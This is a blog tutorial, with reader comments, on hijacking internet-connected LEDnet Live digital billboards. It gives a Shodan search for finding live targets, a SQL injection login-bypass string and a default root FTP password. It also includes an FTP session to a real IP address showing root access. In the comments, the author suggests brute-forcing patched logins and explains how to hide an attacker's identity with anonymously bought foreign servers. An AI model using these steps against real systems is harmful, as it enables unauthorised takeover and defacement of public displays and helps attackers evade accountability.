Hacking Digital Billboards
About a month ago a member of hack forums called Gangs posted a tutorial on how to hack digital billboards with a simple SQL injection, I thought it cant be that simple and tested it out myself, To my surprise, even in 2016 SQL injection is still a valid attack vector on sites connected to the internet, I’m guessing that’s why its still in the OWASP (Open Web Application Security Projects) Top 10.
Click this link to take you to the original post at hack forums http://hackforums.net/showthread.php?tid=5277277
First of all you need find some vulnerable billboards connected to the internet, to do this you need to create a free account at https://www.shodan.io/
Shodan is a search engine that lets the user find specific types of computers (Web Cams, routers, servers, etc.) connected to the internet using a variety of filters.
Once your registered at Shodan you can use the search feature to find our vulnerable billboards.
In the search box type title:”lednet live system” as pictured below
and you should be presented with a list of results like this one in Egypt.
When you click the link in Shodan it should take you directly to the site hosting the billboard system and you will be presented with a login.
So how to hack it? Well the Username Parameter is vulnerable to SQL Injection…
So to Login, paste in the username parameter…
-1558" OR 9005=9005 AND "UxGI"="UxGI
and anything in the password input. Now click login!
Once logged in, take a look at the top right corner you should now be logged in as a Super Admin.
From here you now have full access to the digital billboard and you can control everything from what shows on it, to changing all the display and power settings even enabling the built in WIFI and giving everyone free WIFI.
But wait that’s not all!!!!
There is another vulnerability in these billboards, which is a default root password vulnerability. You can basically get root FTP access to all of these billboards with the details below….
Username: root
Password: 111111$ ftp 186.206.188.175
Connected to 186.206.188.175.
220 Welcome to blah FTP service.
Name (186.206.188.175): root
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /
250 Directory successfully changed.ftp> passive
Passive mode on.
ftp> ls
229 Entering Extended Passive Mode (|||41314|).
150 Here comes the directory listing.
drwxr-xr-x 1 0 0 1464 Jan 01 1970 bin
lrwxrwxrwx 1 0 0 21 Jan 01 1970 c: -> /usr/local/playdata/c
lrwxrwxrwx 1 0 0 21 Jan 01 1970 d: -> /usr/local/playdata/d
drwxr-xr-x 7 0 0 0 May 21 18:08 dev
lrwxrwxrwx 1 0 0 21 Jan 01 1970 e: -> /usr/local/playdata/e
drwxr-xr-x 1 0 0 748 Jan 01 1970 etc
lrwxrwxrwx 1 0 0 21 Jan 01 1970 f: -> /usr/local/playdata/f
drwxr-xr-x 1 0 0 36 Jan 01 1970 home
drwxr-xr-x 1 0 0 1868 Jan 01 1970 lib
lrwxrwxrwx 1 0 0 11 Jan 01 1970 linuxrc -> bin/busybox
drwxr-xr-x 1 0 0 32 Jan 01 1970 mnt
drwxr-xr-x 1 0 0 0 Jan 01 1970 opt
dr-xr-xr-x 51 0 0 0 Jan 01 1970 proc
drwxr-xr-x 1 0 0 116 Jan 01 1970 root
drwxr-xr-x 1 0 0 1332 Jan 01 1970 sbin
drwxr-xr-x 12 0 0 0 Jan 01 1970 sys
drwxrwxrwt 6 0 0 720 May 21 18:16 tmp
drwxr-xr-x 1 0 0 108 Jan 01 1970 usr
drwxr-xr-x 3 0 0 672 Jan 01 1970 var
drwxr-xr-x 4 0 0 288 Jan 01 1970 www
226 Directory send OK.
ftp>You now have root access to the entire server.
I do think its poor show on the company that makes and sells this product to not have done proper security testing before going to market, which would have picked this up a simple SQL injection and even having a default root password on all your devices tut tut… but I bet there are different types of billboards with the same sort of issues.
i like that….
I’m so putting a Happy Birthday on one for my dad (who’s turning 60) thanks man
Good evening! I have a problem with login and password. When I try to log in site creates the same window and I can’t change anything there. Can somebody help me?!
Hi WinTor228 thanks for your comment, I have just had a quick look at this myself and can’t see any vulnerable systems still showing up in Shodan anymore. This vulnerability has probably been patched by now as this post was from back in 2016.
Hemp
hello, is there any patched tutorial?
Hi Adam
Nothing that i have seen but im sure at very least you would be able to brute force the login.
Hemp
I can’t log in! What can I do?
Hey hemp,
title:”lednet live system” is now showing “No results found”. My best guess is the problem has been rectified perhaps.
Still it would be really cool if it could be done again and will be much appreciated if you could do some post on that again if possible.
I want to try it atleast once in life time 😊😁
Thanks.
Budding Youth.
Hi Budding Youth Thanks for your comment.
This was just a simple SQL injection, you can find plenty of them using google dorks to all sorts of web portals.
Check out my tutorial on SQL Injection Basics This should give you all the information you need to get started with SQL injection.
Hemp.
hi, i just tested this method and it works. Copy/paste does not work but typing will return the desired results. My guess is the double quotation font/style.
Hi Reader
Thanks for taking the time and letting me know.. I thought some of the problems was actually finding the servers in Showdan
I’ll take a look myself tonight if it is something in the blog post hopefully I can resolve it.
Hemp
Suh, Hemp.
Is there another way to hack billboards? since my city doesn’t have any lednet live billboards, or at least I didn’t find any while searching on shodan, 2 american ones and 1 russian one. I would LOVE to find one located in Riyadh, Saudi Arabia.
Much thanks, learnin’ hacker
Hi demtions
Thanks for your comment, You are the first person to post a comment on my newly created Security Tutorials.
As you stated the method above only works for Lednet live billboards and I am pretty sure has now been patched…
But there are plenty of ways to hack other Digital Billboards. If you are still learning though, try and get your head around the basics first. In this case it was a simple SQL injection and default creds that allowed us to access the ftp taking control of the billboard.
I would say start by taking a look at my tutorial on setting up a vulnerable LAMP server
Then go through my SQL injection basics tutorial to understand why and how this attack worked.
after you have the baiscs you need to understand what you are trying to hack, what type of device is it, how is it managed ( you would like to think there management would be locked down to a specific IP but they are not always ).
I have even read that some of these billboards are managed by a PC in the billboard itself but you will need to find this out.
if you were feeling practically brasen you could contact the manufacturer to get any technical information.
leave me another comment if you want any more information or help.
Hemp
hey there,
i managed to do everything so far but when i hit play on the monitor menu i keep getting
“Send IPC
Error”
i dont really know what that means and ive been looking left and right for answers.
Can you help me?
Much apreciated
Hi Cat
i am not sure myself, the working ins and outs of the LEDnet LIVE system, i am actually surprised you found one as i thought they had all been patched.
Good luck,
Hemp
Hey Hemp,
I’m interesting in Hacktivism and I’ve used Shodan before to look for vulnerable devices. Since you connected to this billboard, what steps did you take to conceal your presence/remove traces?
Hi Mike
Thanks for your comment.
This is a interesting topic and is a good idea for a future tutorial.
To be honest, there is no real way to be 100% anonymous online, if you do something bad enough you will be tracked down.
>You could get yourself a VPN “one that says they do not keep logs” and run TOR over it. however your ISP will still be able to see you connecting on the VPN and what do you think the VPN company will give up about you when they get raided by the police.
>You could also try and use a public WiFi but even then with all the CCTV everywhere, if you do something bad enough you will still find you.
> My personal preference is purchase a Linux VPS in bitcoin or a prepaid Credit card which you paid for in cash, preferably in country like Russia. You can then SSH into it and do all your hacking from that, however even this is traceable CCTV in the shop the pre-paid card is purchased, ISP logs of you connecting to the VPS.
If you google how hackers have got caught, you will see there is always something stupid like metadata that catches them out in the end. Just think how much resource a police force or government agency has at its disposal, tracking you down if they needed.
The only real way to stay 100% on the right side of the law is to only hack what you have consent to hack.
Stay Safe Mike don’t do anything stupid!!
Hemp 🙂
This is very interesting, but will i get arrested for it? I thimk it’s kool but I’m not interested in getting raided by the feds. Thanks 🙂
Good question… Well, its only illegal if you get caught right … but on a serious note, you should only attempt to hack something you own or have permission to hack.